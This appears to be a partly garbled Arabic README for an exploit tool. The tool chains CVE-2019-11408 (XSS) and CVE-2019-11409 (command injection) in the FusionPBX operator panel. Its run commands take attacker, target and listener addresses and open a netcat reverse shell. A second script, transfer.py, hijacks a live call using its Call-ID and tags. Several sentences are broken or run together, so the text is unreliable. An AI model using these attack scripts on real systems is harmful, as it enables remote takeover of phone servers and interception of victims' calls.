
سلسلة CVE-2019-11408 – XSS في لوحة المشغل و CVE-2019-11409 – حقن الأوامر في لوحة المشغل.
يحاول هذا الكود البسيط إكمال تنفيذ الثغرة المتسلسلة التي قدمها
Dustin Cobb
في مقال RCE Using Caller ID – Multiple Vulnerabilities In FusionPBX.
https://{fusionpbx_address}/app/operator_panel/index.phpnetcat على نظام بعيد (rce_listener_address).python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}netcat ويوفر شل عكسية.بينما نعرف Call-ID و from-tag و to-tag من مكالمة، سيؤدي تشغيل الكود أدناه إلى استبدالك مكان الضحية في المكالمة.
{Call-ID}{semicolon}"to-teg:"{to-tag}"from-tag"{from-tag}.python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}